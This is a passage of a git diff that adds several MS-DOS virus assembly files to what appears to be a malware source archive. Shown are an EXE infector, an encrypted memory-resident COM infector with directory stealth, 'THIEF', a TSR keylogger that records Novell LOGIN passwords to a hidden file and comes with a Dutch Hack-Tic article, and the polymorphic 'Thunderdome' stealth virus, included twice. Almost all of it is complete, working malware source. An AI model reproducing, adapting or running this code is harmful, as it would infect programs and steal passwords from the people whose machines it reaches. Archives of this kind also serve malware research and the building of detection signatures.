ah,47h ; get current directory + xor dl,dl + push ds + push ss + pop ds + int 21h + + pop ds + dec si + mov byte ptr ss:[si],'\' ; fix directory + +next_dir: + call infect_dir + + cmp byte ptr [bp + infections],INFECT + je traverse_done + + lea dx,[bp + outer] ; repeat in next dir up + mov ah,3Bh + int 21h + jnc next_dir + +traverse_done: + add sp,64 ; reset + mov dx,si + push ds + push ss + pop ds + mov ah,3Bh + int 21h + pop ds + ret + +infect_dir: + mov ah,4Eh + lea dx,[bp + find_me] + int 21h + jc infect_done + +next_file: + lea dx,[bp + new_DTA + 1Eh] + call execute + cmp byte ptr [bp + infections],INFECT + je infect_done + mov ah,4Fh + int 21h + jnc next_file + +infect_done: + ret +execute: + push si + + mov ax,4300h ; change attributes + int 21h + + push cx dx ds + xor cx,cx + call set_attributes + + mov ax,3D02h ; open file + int 21h + jc cant_open + xchg bx,ax + + mov ax,5700h ; save file date/time + int 21h + push cx dx + mov ah,3Fh + mov cx,28 + lea dx,[bp + read_buffer] + int 21h + + cmp word ptr [bp + read_buffer],'ZM' + je infect_exe ; yes, infect as .EXE + + jmp dont_infect + +fix_date_time: + pop dx cx + mov ax,5701h ; restore file date/time + int 21h + + inc byte ptr [bp + infections] + +close: + pop ds dx cx ; restore attributes + call set_attributes + + mov ah,3Eh ; close file + int 21h + +cant_open: + pop si + ret + + +set_attributes: + mov ax,4301h + int 21h + ret + +dont_infect: + pop cx dx ; can't infect, skip + jmp close + +infect_exe: + cmp word ptr [bp + read_buffer + 26],0 + jne dont_infect ; overlay, don't infect + + cmp word ptr [bp + read_buffer + 16],MARKER + je dont_infect ; infected already + + les ax,dword ptr [bp + read_buffer + 20] + mov [bp + exe_cs],es + mov [bp + exe_ip],ax + les ax,dword ptr [bp + read_buffer + 14] + mov [bp + exe_ss],ax + mov [bp + exe_sp],es + mov word ptr [bp + read_buffer + 16],MARKER + mov ax,4202h ; to end of file + cwd + xor cx,cx + int 21h + + push ax dx ; save file size + + push bx + mov cl,12 ; calculate offsets for CS + shl dx,cl ; and IP + mov bx,ax + mov cl,4 + shr bx,cl + add dx,bx + and ax,15 + pop bx + + sub dx,word ptr [bp + read_buffer + 8] + mov word ptr [bp + read_buffer + 22],dx + mov word ptr [bp + read_buffer + 20],ax + add dx,100h + mov word ptr [bp + read_buffer + 14],dx + + pop dx ax ; calculate prog size + + add ax,VIRUS_SIZE + 3 + adc dx,0 + mov cx,512 ; in pages + div cx ; then save results + inc ax + mov word ptr [bp + read_buffer + 2],dx + mov word ptr [bp + read_buffer + 4],ax + + mov ah,40h + mov cx,VIRUS_SIZE + 3 + lea dx,[bp + virus_begin] + int 21h + + + mov ax,4200h ; back to beginning + cwd + xor cx,cx + int 21h + + mov ah,40h ; and fix up header + mov cx,28 + lea dx,[bp + read_buffer] + int 21h + jmp fix_date_time ; done + +activate: + ; Insert your routine here + ret + +courtesy_of db '[BW]',0 +signature db 'Test virus #2',0 + +get_extension: + push ds ; find extension + pop es + mov di,dx + mov cx,64 + mov al,'.' + repnz scasb + ret + +find_me db '*.EXE',0 +outer db '..',0 + +infections db 0 +virus_end: +VIRUS_SIZE equ virus_end - virus_begin +read_buffer db 28 dup (?) ; read buffer +new_DTA db 128 dup(?) + +end_heap: + +MEM_SIZE equ end_heap - start + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.test3.asm b/MSDOS/Virus.MSDOS.Unknown.test3.asm new file mode 100644 index 00000000..57cf1b1f --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.test3.asm @@ -0,0 +1,318 @@ +; test3.asm : Test virus #3 +; Created with Biological Warfare - Version 0.90 by MnemoniX + +PING equ 0FA10h +PONG equ 0B8D4h +STAMP equ 31 + +code segment + org 0 + assume cs:code,ds:code + +start: + db 0E9h,3,0 ; to virus +host: + db 0CDh,20h,0 ; host program +virus_begin: + + db 0BBh ; decryption module +code_offset dw offset virus_code + mov si,VIRUS_SIZE / 2 + 1 + db 0B8h +cipher dw 0 + +decrypt: + xor cs:[bx],ax + add bx,2 + dec si + jnz decrypt + + +virus_code: + push ds es + + call $ + 3 ; BP is instruction ptr. + pop bp + sub bp,offset $ - 1 + + mov ax,PING ; test for residency + int 21h + cmp dx,PONG + je installed + + mov ax,es ; Get PSP + dec ax + mov ds,ax ; Get MCB + + sub word ptr ds:[3],((MEM_SIZE+1023) / 1024) * 64 + sub word ptr ds:[12h],((MEM_SIZE+1023) / 1024) * 64 + mov es,word ptr ds:[12h] + + push cs ; copy virus into memory + pop ds + xor di,di + mov si,bp + mov cx,(virus_end - start) / 2 + 1 + rep movsw + + xor ax,ax ; capture interrupts + mov ds,ax + + mov si,21h * 4 ; get original int 21 + mov di,offset old_int_21 + movsw + movsw + + mov word ptr ds:[si - 4],offset new_int_21 + mov ds:[si - 2],es ; and set new int 21 + +installed: + pop es ds ; restore segregs +com_exit: + lea si,[bp + host] ; restore host program + mov di,100h + push di + movsw + movsb + + call fix_regs ; fix up registers + ret ; and leave + +fix_regs: + xor ax,ax + cwd + xor bx,bx + mov si,100h + xor di,di + xor bp,bp + ret + +; interrupt 21 handler +int_21: + pushf + call dword ptr cs:[old_int_21] + ret + +new_int_21: + cmp ax,PING ; residency test + je ping_pong + cmp ah,11h ; directory stealth + je dir_stealth + cmp ah,12h + je dir_stealth + cmp ah,4Eh ; directory stealth + je dir_stealth_2 + cmp ah,4Fh + je dir_stealth_2 + cmp ax,4B00h ; execute program + jne int_21_exit + jmp execute +int_21_exit: + db 0EAh ; never mind ... +old_int_21 dd 0 + +ping_pong: + mov dx,PONG + iret + +dir_stealth: + call int_21 ; get dir entry + test al,al + js dir_stealth_done + + push ax bx es + mov ah,2Fh + int 21h + + cmp byte ptr es:[bx],-1 ; check for extended FCB + jne no_ext_FCB + add bx,7 +no_ext_FCB: + mov ax,es:[bx + 17h] ; check for infection marker + and al,31 + cmp al,STAMP + jne dir_fixed + + sub word ptr es:[bx + 1Dh],VIRUS_SIZE + 3 + sbb word ptr es:[bx + 1Fh],0 +dir_fixed: + pop es bx ax +dir_stealth_done: + iret + +dir_stealth_2: + pushf + call dword ptr cs:[old_int_21] + jc dir_stealth_done_2 + +check_infect2: + push ax bx es + + mov ah,2Fh + int 21h + mov ax,es:[bx + 16h] + and al,31 ; check timestamp + cmp al,STAMP + jne fixed_2 + + sub es:[bx + 1Ah],VIRUS_SIZE + 3 + sbb word ptr es:[bx + 1Ch],0 + +fixed_2: + pop es bx ax + clc ; clear carry +dir_stealth_done_2: + retf 2 +execute: + push ax bx cx dx si di ds es + + xor ax,ax ; critical error handler + mov es,ax ; routine - catch int 24 + mov es:[24h * 4],offset int_24 + mov es:[24h * 4 + 2],cs + + mov ax,4300h ; change attributes + int 21h + + push cx dx ds + xor cx,cx + call set_attributes + + mov ax,3D02h ; open file + int 21h + jc cant_open + xchg bx,ax + + push cs ; CS = DS + pop ds + + mov ax,5700h ; save file date/time + int 21h + push cx dx + mov ah,3Fh + mov cx,28 + mov dx,offset read_buffer + int 21h + + cmp word ptr read_buffer,'ZM' ; .EXE? + je dont_infect ; .EXE, skip + + mov al,2 ; move to end of file + call move_file_ptr + + cmp dx,65279 - (VIRUS_SIZE + 3) + ja dont_infect ; too big, don't infect + + sub dx,VIRUS_SIZE + 3 ; check for previous infection + cmp dx,word ptr read_buffer + 1 + je dont_infect + + add dx,VIRUS_SIZE + 3 + mov word ptr new_jump + 1,dx + + add dx,103h + call encrypt_code ; encrypt virus + + mov dx,offset read_buffer ; save original program head + int 21h + + mov ah,40h ; write virus to file + mov cx,VIRUS_SIZE + mov dx,offset encrypt_buffer + int 21h + + xor al,al ; back to beginning of file + call move_file_ptr + + mov dx,offset new_jump ; and write new jump + int 21h + +fix_date_time: + pop dx cx + and cl,-32 ; add time stamp + or cl,STAMP + mov ax,5701h ; restore file date/time + int 21h + +close: + pop ds dx cx ; restore attributes + call set_attributes + + mov ah,3Eh ; close file + int 21h + +cant_open: + pop es ds di si dx cx bx ax + jmp int_21_exit ; leave + + +set_attributes: + mov ax,4301h + int 21h + ret + +dont_infect: + pop cx dx ; can't infect, skip + jmp close + +move_file_ptr: + mov ah,42h ; move file pointer + cwd + xor cx,cx + int 21h + + mov dx,ax ; set up registers + mov ah,40h + mov cx,3 + ret + +courtesy_of db '[BW]',0 +signature db 'Test virus #3',0 + + +encrypt_code: + push ax cx + + push dx + xor ah,ah ; get time for random number + int 1Ah + + mov cipher,dx ; save encryption key + pop cx + add cx,virus_code - virus_begin + mov code_offset,cx ; save code offset + + push cs ; ES = CS + pop es + + mov si,offset virus_begin ; move decryption module + mov di,offset encrypt_buffer + mov cx,virus_code - virus_begin + rep movsb + + mov cx,VIRUS_SIZE / 2 + 1 +encrypt: + lodsw ; encrypt virus code + xor ax,dx + stosw + loop encrypt + + pop cx ax + ret + +int_24: + mov al,3 ; int 24 handler + iret +new_jump db 0E9h,0,0 + +virus_end: +VIRUS_SIZE equ virus_end - virus_begin +read_buffer db 28 dup (?) ; read buffer +encrypt_buffer db VIRUS_SIZE dup (?) ; encryption buffer + +end_heap: + +MEM_SIZE equ end_heap - start + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.thief.asm b/MSDOS/Virus.MSDOS.Unknown.thief.asm new file mode 100644 index 00000000..e98dd3d6 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.thief.asm @@ -0,0 +1,269 @@ +;redaktie van The Key, John D., Tx, Herman Acker, Peter Poelman, Paul en Rop. +;Nadruk wordt door de redaktie toegestaan! +;------------------------------------------------------------------------------ +; +; Als je via een Local Area Network onder MS-DOS files wilt kunnen bewerken +;kun je bijna niet om de Novell networksoftware heen. Of je nou op je werk of +;op school met Novell werkt: je hebt altijd te weinig bevoegdheid op het +;systeem. Hack-Tic helpt je door te dringen in het systeem met dit artikel van +;een anonieme auteur. +; +; THIEF is een TSR (Terminate and Stay Resident; geheugen-resident) programma +;voor de IBM-compatible, geschreven in 8086 machinetaal. Het probeert om +;wachtwoorden voor het Novell PC Local Area Netwerk te stellen. De oorsprong +;van THIEF ligt op een school met een bloeiende hack-cultuur: George Washington +;High School in Denver, Colorado USA. +; Deze school is meer dan goed voorzien van IBM micro's. Vijf lokalen van 30 +;computers hangen allemaal via een ethernet aan elkaar. Het netwerk draait +;onder Novell. Vier van de vijf lokalen gebruiken boot-proms [geheugenchips op +;de netwerk-interfacekaart. Zij zorgen ervoor dat er opgestart kan worden +;zonder dat er een disk (of zelfs een drive(!) nodig is op de betreffende +;machine.] voor het opstarten van de PC's. De vijfde ruimte bevat IBM PS/2 +;model 80's(!) met harddisks. De systeembeheerders en andere "power-users" +;maken graag gebruik van deze machines. Deze machines "booten" vanaf hun eigen +;hard-disks, zij gebruiken geen boot-proms. +; Op een van deze computers werd THIEF voor het eerst gesignaleerd. THIEF +;maakt namelijk gebruik van een zwakheid in de beveiliging tijdens de bootfase. +;In de AUTOEXEC.BAT file werd een extra regel toegevoegd die een "verborgen" +;programma op de bootschijf activeerde. Zodra er echter een programma met de +;naam LOGIN wordt uitgevoerd komt THIEF tot leven en hij slaat alle +;toetsaanslagen op in een (eveneens verborgen) file op de boot disk. De +;onbevoegde kan later terugkomen en kijken wat zijn val gevangen heeft. +; Voordat we het "metabolisme" van THIEF verder gaan ontleden eerst even de +;zwakheden die deze hack mogelijk maken: +; -Een boot-proces dat veranderd kan worden +; -Fysieke toegang (door een onbevoegde) tot de computer +; Beide zijn goed te verhelpen. Boot-proms en een slot op de deur en klaar is +;Kees. +; Terug naar het "metabolisme". Nogal verassend is dat het programma dezelfde +;"hook" gebruikt als de Novell shell. Het grijpt de centrale toegang naar DOS: +;interrupt 21h [ (hex) wordt door programma's gebruikt om een DOS functie aan te +;roepen. De Novell-Netware shell onderschept deze stroom om zondig zelf op +;bepaalde verzoeken te reageren. ]. Het onderschept alle aanroepen naar DOS. +;Zodra een EXECute file call wordt gemaakt met de filename LOGIN worden alle +;toetsaanslagen vastgelegd totdat het programma terugkeert naar DOS. Tijdens het +;LOGIN process wordt het Novell wachtwoord ingetikt en dus is de hacker een +;wachtwoord rijker. Het is allemaal nog iets te ingewikkeld: het programma had +;ook gewoon op de speciale Novell inlog functieaanroep kunnen wachten.Maar ach, +;zo werkt het ook. +; Dit soort programma's zijn alles behalve nieuw. Ze zijn net zo oud als +;wachtwoord-beveiliging. Bestudering van dit programma geeft meer inzicht in de +;problematiek van LAN-beveiliging. +; De toekomst zal zeker geheel nieuwe identificatietechnieken brengen. Net zo +;zeker is dat zij begroet zullen worden door geduldige, enigszins doortrapte +;genialiteit. +; +; Opmerking: THIEF werd door zijn maker ook wel eens GETIT genoemd. De maker +;was gelukkig onvoorzichtig genoeg om de sourcecode te laten slingeren. +; +; +; DE CODE VAN THIEF: +; +; +cseg segment + assume cs:cseg,ds:cseg + + org 100h + public oi21,ac,ob,fn,fh,flag,ni21,jtov,oc,lethro,wpwtf,exist,create, + public cntr,lits,begin + + .RADIX 16 +start: + push cs + push cs + push cs + pop ds + pop es + mov ax,0fffeh + CLI + pop ss + mov sp,ax + STI + jmp begin +oi21 dd ? +ac dw 0 +ob dw 80h dup (?) +buff2 db 80h dup (?) +fn db 'c:\testing.tmp',0,' ' +search1 db 'LOGIN' +foundf db 0 +fh dw 0 +flag db 0 +cntr dw 0 + +ni21: + assume cs:cseg,ds:nothing,es:nothing + cmp ax,4b00h + je exec + cmp foundf,0ffh + jne nc + cmp ah,8 + je oc + cmp ah,7 + je oc + +nc: + push ax + mov al,cs:flag + not al + cmp al,0 + jne jtov + mov ax,cntr + inc ax + mov cntr,ax + cmp ax,31h + jb jtov + xor ax,ax + mov cntr,ax + mov flag,al + pop ax + pushf + call dword ptr [oi21] + push ds + push cs + pop ds + push ax + push bx + push cx + push dx + jmp short wpwtf + +jtov: + pop ax + jmp dword ptr cs:[oi21] + +exec: call scanfor + jmp nc +oc: + + pushf + call dword ptr cs:[oi21] + assume ds:cseg + push ds + push cs + pop ds + push ax + push bx + push cx + push dx + mov bx,ac + mov [bx],al + inc bx + mov [ac],bx + cmp al,0dh + jne lethro + mov byte ptr [bx],0ah + not cs:[flag] +lethro: + pop dx + pop cx + pop bx + pop ax + pop ds + iret + +scanfor: + push ax + push di + push si + push es + push ds + push cs + push cs + pop es + mov si,dx + mov di,offset buff2 +moveit: + lodsb + and al,0dfh + stosb + or al,al + jnz moveit + pop ds + mov di,offset buff2 +look: + push di + mov si,offset search1 + mov cx,5 + repe cmpsb + pop di + or cx,cx + jz foundit + inc di + cmp byte ptr [di+5],0 + je not_found + jmp look +not_found: + xor ax,ax + mov foundf,al + jmp short endofsearch +foundit: + mov ax,0ffh + mov foundf,al +endofsearch: + pop ds + pop es + pop si + pop di + pop ax + ret + +wpwtf: + mov ax,3d02h + mov dx,offset fn + pushf + call dword ptr [oi21] + jnc exist + cmp al,2 + je create + jmp lethro +create: + mov ah,3ch + mov dx,offset fn + mov cx,02h+04h + pushf + call dword ptr [oi21] + jnc exist + jmp lethro +exist: + mov fh,ax + mov bx,ax + mov ax,4202h + xor cx,cx + xor dx,dx + pushf + call dword ptr [oi21] + mov cx,[ac] + mov dx,offset ob + sub cx,dx + mov [ac],dx + inc cx + mov bx,fh + mov ah,40h + pushf + call dword ptr [oi21] + mov ah,3eh + mov bx,fh + pushf + call dword ptr [oi21] + jmp lethro + +lits db 90h +begin: + mov ax,offset ob + mov [ac],ax + mov ax,3521h + int 21h + mov di,offset oi21 + mov [di],bx + mov [di+2],es + mov dx,offset ni21 + push cs + pop ds + mov ax,2521h + int 21h + mov dx,offset lits + int 27h +cseg ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.thunder.a86 b/MSDOS/Virus.MSDOS.Unknown.thunder.a86 new file mode 100644 index 00000000..0567b138 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.thunder.a86 @@ -0,0 +1,403 @@ +; +; Thunderdome virus by John Tardy / TridenT +; + + Org 0h + +decr: jmp Crypt + db 'Carcass' +Loopje DB 0e2h + db 0fah +DecrLen Equ $-Decr + +Crypt: Push Ax + call Get_Ofs +Get_Ofs: pop Bp + sub Bp,Get_Ofs + + Mov Ah,2ah + Int 21h + Cmp Cx,1993 + Ja Makeya + jb Installed + Cmp Dh,10 + Jb installed + + +Makeya: Mov Ax,0DEADh + Int 21h + Cmp Ax,0AAAAh + Je Installed + + mov ax,3521h + int 21h + mov word ptr cs:old21[bp],bx + mov word ptr cs:old21[bp][2],es + + mov ax,cs + dec ax + mov ds,ax + cmp byte ptr ds:[0000],'Z' + jne installed + mov ax,word ptr ds:[0003] + sub ax,ParLen + jb installed + mov word ptr ds:[0003],ax + sub word ptr ds:[0012h],ParLen + lea si,decr[bp] + xor di,di + mov es,ds:[12h] + mov ds,cs + mov cx,virlen + rep movsb + mov ax,2521h + mov ds,es + mov dx,offset new21 + int 21h +Installed: Mov Di,100h + Push Di + Lea Si,Org_Prg[Bp] + Push Cs + Pop Ds + Push Cs + Pop Es + Movsw + Movsb + Pop Bx + Pop Ax + Jmp Bx + +Old21 dd 0 + +New21: cmp ax,0deadh + jne chkfunc + mov cx,0aaaah + mov ax,cx + iret +chkfunc: cmp ah,12h + je findFCBst + cmp ah,11h + je findfcbst + cmp ah,4fh + je findst + cmp ah,4eh + je findst + push ax + push bx + push cx + push dx + push si + push di + push bp + push ds + push es + cmp ah,3dh + je infectHan + cmp ah,4bh + je infectHan + cmp ah,41h + je infectHan + cmp ah,43h + je infectHan + cmp ah,56h + je infectHan + cmp ah,0fh + je infectFCB + cmp ah,23h + je infectFCB + cmp ah,6ch + je infectdos4 + jmp endint + +findfcbst: jmp findfcb +findst: jmp find + +InfectFCB: mov si,dx + lodsb + push cs + pop es + lea di,fnam + mov cx,8 + rep movsb + mov cx,3 + inc di + rep movsb + lea dx,fnam + push cs + pop ds + +InfectHan: mov si,dx + mov cx,100h +findpnt: lodsb + cmp al,'.' + je chkcom + loop findpnt + jmp endi + +infectdos4: and dx,0fh + cmp dx,1 + jne endi + mov dx,si + jmp infecthan + +chkcom: lodsw + or ax,2020h + cmp ax,'oc' + jne endi + lodsb + or al,20h + cmp al,'m' + je doitj +endi: jmp endint +doitj: push dx + push ds + mov ax,4300h + call dos + mov cs:fatr,cx + mov ax,4301h + sub cx,cx + call dos + mov ax,3d02h + call dos + jnc getdate + jmp error +getdate: mov bx,5700h + xchg ax,bx + call dos + mov cs:fdat,cx + mov cs:fdat+2,dx + and cx,1fh + cmp cx,1fh + jne chkexe + jmp done +chkexe: mov ah,3fh + push cs + pop ds + lea dx,Org_prg + mov cx,3 + call dos + cmp word ptr cs:Org_prg[0],'MZ' + je close + cmp word ptr cs:Org_prg[0],'ZM' + je close + + Mov ax,4202h + sub cx,cx + cwd + call dos + + sub ax,3 + mov cs:jump[1],ax + + Add Ax,Offset Crypt+103h + Mov S_1[1],Ax + Mov S_2[1],Ax + Mov S_3[4],Ax + Mov S_4[4],Ax + Call GenPoly + + mov ah,40h + push cs + pop ds + lea dx,coder + mov cx,virlen + call dos + + mov ax,4200h + xor cx,cx + cwd + call dos + + mov ah,40h + lea dx,jump + mov cx,3 + call dos + + or cs:fdat,01fh + +close: mov ax,5701h + mov cx,cs:fdat + mov dx,cs:fdat[2] + call dos + +done: mov ah,3eh + call dos + pop ds + pop dx + push dx + push ds + mov ax,4301h + mov cx,fatr + call dos + +error: pop ds + pop dx + +endint: pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + jmp d ptr cs:[old21] + +GenPoly: Xor Byte Ptr [Loopje],2 + Xor Ax,Ax + Mov Es,Ax + Mov Ax,Es:[46ch] + Mov Es,Cs + Push Ax + And Ax,07ffh + Add Ax,CryptLen + Mov S_1[4],Ax + Mov S_2[4],Ax + Mov S_3[1],Ax + Mov S_4[1],Ax +Doit: Pop Ax + Push Ax + And Ax,3 + Shl Ax,1 + Mov Si,Ax + Mov Ax,W Table[Si] + Mov Si,Ax + Lea Di,decr + Movsw + Movsw + Movsw + Movsw + Pop Ax + Stosb + Movsb + Mov Dl,Al + Lea Si,Decr + Lea Di,Coder + Mov Cx,DecrLen + Rep Movsb + Lea Si,Crypt + Mov Cx,CryptLen +Encrypt: Lodsb + Xor Al,Dl + Stosb + Loop Encrypt + Cmp Dl,0 + Je Fuckit + Ret + +FuckIt: Lea Si,Encr0 + Lea Di,Coder + Mov Cx,Encr0Len + Rep Movsb + Mov Ax,Cs:jump[1] + Add Ax,Encr0Len+2 + Mov Cs:jump[1],Ax + Ret + + Db 13,10,'Created in Holland, released near Bolzano/Italy.' + Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not' + Db 13,10,'ment to be destructive, however, some programs might not work anymore,' + Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your' + Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!' + Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).' + Db 13,10,'Greetings go to all other virus writers!' + +Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4 + +S_1: Lea Si,0 + Mov Cx,0 + DB 80h,34h + Inc Si +S_2: Lea Di,0 + Mov Cx,0 + DB 80h,35h + Inc Di +S_3: Mov Cx,0 + Lea Si,0 + DB 80h,34h + Inc Si +S_4: Mov Cx,0 + Lea Di,0 + DB 80h,35h + Inc Di + + Db '[ "Thunderdome" virus by ' + +Encr0 Db 'John Tardy' +Encr0Len Equ $-Encr0 + + Db ' / TridenT ]' + +getdta: pop si + pushf + push ax + push bx + push es + mov ah,2fh + call dos + jmp short si + +FindFCB: call DOS + cmp al,0 + jne Ret1 + call getdta + cmp byte ptr es:[bx],-1 + jne FCBOk + add bx,8 +FCBOk: mov al,es:[bx+16h] + and al,1fh + cmp al,1fh + jne FileOk + sub word ptr es:[bx+1ch],Virlen + sbb word ptr es:[bx+1eh],0 + jmp short Time + +Find: call DOS + jc Ret1 + call getdta + mov al,es:[bx+16h] + and al,1fh + cmp al,1fh + jne FileOk + sub word ptr es:[bx+1ah],VirLen + sbb word ptr es:[bx+1ch],0 +Time: xor byte ptr es:[bx+16h],10h +FileOk: pop es + pop bx + pop ax + popf +Ret1: retf 2 + +dos: pushf + call dword ptr cs:[old21] + ret + +Org_prg dw 0cd90h + db 20h + +fnam db 8 dup (0) + db '.' + db 3 dup (0) + db 0 +fatr dw 0 +fdat dw 0,0 + + +jump db 0e9h,0,0 + +ResLen Equ ($-Decr)/10h + +ParLen Equ (Reslen*2)+10h + +CryptLen Equ $-Crypt + +VirLen Equ $-Decr + +Coder Equ $ + + +; +; > ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt < +; > ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? < +; diff --git a/MSDOS/Virus.MSDOS.Unknown.thunder.asm b/MSDOS/Virus.MSDOS.Unknown.thunder.asm new file mode 100644 index 00000000..0567b138 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.thunder.asm @@ -0,0 +1,403 @@ +; +; Thunderdome virus by John Tardy / TridenT +; + + Org 0h + +decr: jmp Crypt + db 'Carcass' +Loopje DB 0e2h + db 0fah +DecrLen Equ $-Decr + +Crypt: Push Ax + call Get_Ofs +Get_Ofs: pop Bp + sub Bp,Get_Ofs + + Mov Ah,2ah + Int 21h + Cmp Cx,1993 + Ja Makeya + jb Installed + Cmp Dh,10 + Jb installed + + +Makeya: Mov Ax,0DEADh + Int 21h + Cmp Ax,0AAAAh + Je Installed + + mov ax,3521h + int 21h + mov word ptr cs:old21[bp],bx + mov word ptr cs:old21[bp][2],es + + mov ax,cs + dec ax + mov ds,ax + cmp byte ptr ds:[0000],'Z' + jne installed + mov ax,word ptr ds:[0003] + sub ax,ParLen + jb installed + mov word ptr ds:[0003],ax + sub word ptr ds:[0012h],ParLen + lea si,decr[bp] + xor di,di + mov es,ds:[12h] + mov ds,cs + mov cx,virlen + rep movsb + mov ax,2521h + mov ds,es + mov dx,offset new21 + int 21h +Installed: Mov Di,100h + Push Di + Lea Si,Org_Prg[Bp] + Push Cs + Pop Ds + Push Cs + Pop Es + Movsw + Movsb + Pop Bx + Pop Ax + Jmp Bx + +Old21 dd 0 + +New21: cmp ax,0deadh + jne chkfunc + mov cx,0aaaah + mov ax,cx + iret +chkfunc: cmp ah,12h + je findFCBst + cmp ah,11h + je findfcbst + cmp ah,4fh + je findst + cmp ah,4eh + je findst + push ax + push bx + push cx + push dx + push si + push di + push bp + push ds + push es + cmp ah,3dh + je infectHan + cmp ah,4bh + je infectHan + cmp ah,41h + je infectHan + cmp ah,43h + je infectHan + cmp ah,56h + je infectHan + cmp ah,0fh + je infectFCB + cmp ah,23h + je infectFCB + cmp ah,6ch + je infectdos4 + jmp endint + +findfcbst: jmp findfcb +findst: jmp find + +InfectFCB: mov si,dx + lodsb + push cs + pop es + lea di,fnam + mov cx,8 + rep movsb + mov cx,3 + inc di + rep movsb + lea dx,fnam + push cs + pop ds + +InfectHan: mov si,dx + mov cx,100h +findpnt: lodsb + cmp al,'.' + je chkcom + loop findpnt + jmp endi + +infectdos4: and dx,0fh + cmp dx,1 + jne endi + mov dx,si + jmp infecthan + +chkcom: lodsw + or ax,2020h + cmp ax,'oc' + jne endi + lodsb + or al,20h + cmp al,'m' + je doitj +endi: jmp endint +doitj: push dx + push ds + mov ax,4300h + call dos + mov cs:fatr,cx + mov ax,4301h + sub cx,cx + call dos + mov ax,3d02h + call dos + jnc getdate + jmp error +getdate: mov bx,5700h + xchg ax,bx + call dos + mov cs:fdat,cx + mov cs:fdat+2,dx + and cx,1fh + cmp cx,1fh + jne chkexe + jmp done +chkexe: mov ah,3fh + push cs + pop ds + lea dx,Org_prg + mov cx,3 + call dos + cmp word ptr cs:Org_prg[0],'MZ' + je close + cmp word ptr cs:Org_prg[0],'ZM' + je close + + Mov ax,4202h + sub cx,cx + cwd + call dos + + sub ax,3 + mov cs:jump[1],ax + + Add Ax,Offset Crypt+103h + Mov S_1[1],Ax + Mov S_2[1],Ax + Mov S_3[4],Ax + Mov S_4[4],Ax + Call GenPoly + + mov ah,40h + push cs + pop ds + lea dx,coder + mov cx,virlen + call dos + + mov ax,4200h + xor cx,cx + cwd + call dos + + mov ah,40h + lea dx,jump + mov cx,3 + call dos + + or cs:fdat,01fh + +close: mov ax,5701h + mov cx,cs:fdat + mov dx,cs:fdat[2] + call dos + +done: mov ah,3eh + call dos + pop ds + pop dx + push dx + push ds + mov ax,4301h + mov cx,fatr + call dos + +error: pop ds + pop dx + +endint: pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + jmp d ptr cs:[old21] + +GenPoly: Xor Byte Ptr [Loopje],2 + Xor Ax,Ax + Mov Es,Ax + Mov Ax,Es:[46ch] + Mov Es,Cs + Push Ax + And Ax,07ffh + Add Ax,CryptLen + Mov S_1[4],Ax + Mov S_2[4],Ax + Mov S_3[1],Ax + Mov S_4[1],Ax +Doit: Pop Ax + Push Ax + And Ax,3 + Shl Ax,1 + Mov Si,Ax + Mov Ax,W Table[Si] + Mov Si,Ax + Lea Di,decr + Movsw + Movsw + Movsw + Movsw + Pop Ax + Stosb + Movsb + Mov Dl,Al + Lea Si,Decr + Lea Di,Coder + Mov Cx,DecrLen + Rep Movsb + Lea Si,Crypt + Mov Cx,CryptLen +Encrypt: Lodsb + Xor Al,Dl + Stosb + Loop Encrypt + Cmp Dl,0 + Je Fuckit + Ret + +FuckIt: Lea Si,Encr0 + Lea Di,Coder + Mov Cx,Encr0Len + Rep Movsb + Mov Ax,Cs:jump[1] + Add Ax,Encr0Len+2 + Mov Cs:jump[1],Ax + Ret + + Db 13,10,'Created in Holland, released near Bolzano/Italy.' + Db 13,10,'This virus is made to test the spreading rate of viruses in Italy. It is not' + Db 13,10,'ment to be destructive, however, some programs might not work anymore,' + Db 13,10,'because of CRC-checking. I am sorry if I accidentally corrupted one of your' + Db 13,10,'programs, but HEY! That is how life is, eh? Try to get our virus collection!' + Db 13,10,'and try TPE, or DMU (another one, more compact and also very complex!).' + Db 13,10,'Greetings go to all other virus writers!' + +Table DW Offset S_1,Offset S_2,Offset S_3,Offset S_4 + +S_1: Lea Si,0 + Mov Cx,0 + DB 80h,34h + Inc Si +S_2: Lea Di,0 + Mov Cx,0 + DB 80h,35h + Inc Di +S_3: Mov Cx,0 + Lea Si,0 + DB 80h,34h + Inc Si +S_4: Mov Cx,0 + Lea Di,0 + DB 80h,35h + Inc Di + + Db '[ "Thunderdome" virus by ' + +Encr0 Db 'John Tardy' +Encr0Len Equ $-Encr0 + + Db ' / TridenT ]' + +getdta: pop si + pushf + push ax + push bx + push es + mov ah,2fh + call dos + jmp short si + +FindFCB: call DOS + cmp al,0 + jne Ret1 + call getdta + cmp byte ptr es:[bx],-1 + jne FCBOk + add bx,8 +FCBOk: mov al,es:[bx+16h] + and al,1fh + cmp al,1fh + jne FileOk + sub word ptr es:[bx+1ch],Virlen + sbb word ptr es:[bx+1eh],0 + jmp short Time + +Find: call DOS + jc Ret1 + call getdta + mov al,es:[bx+16h] + and al,1fh + cmp al,1fh + jne FileOk + sub word ptr es:[bx+1ah],VirLen + sbb word ptr es:[bx+1ch],0 +Time: xor byte ptr es:[bx+16h],10h +FileOk: pop es + pop bx + pop ax + popf +Ret1: retf 2 + +dos: pushf + call dword ptr cs:[old21] + ret + +Org_prg dw 0cd90h + db 20h + +fnam db 8 dup (0) + db '.' + db 3 dup (0) + db 0 +fatr dw 0 +fdat dw 0,0 + + +jump db 0e9h,0,0 + +ResLen Equ ($-Decr)/10h + +ParLen Equ (Reslen*2)+10h + +CryptLen Equ $-Crypt + +VirLen Equ $-Decr + +Coder Equ $ + + +; +; > ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt 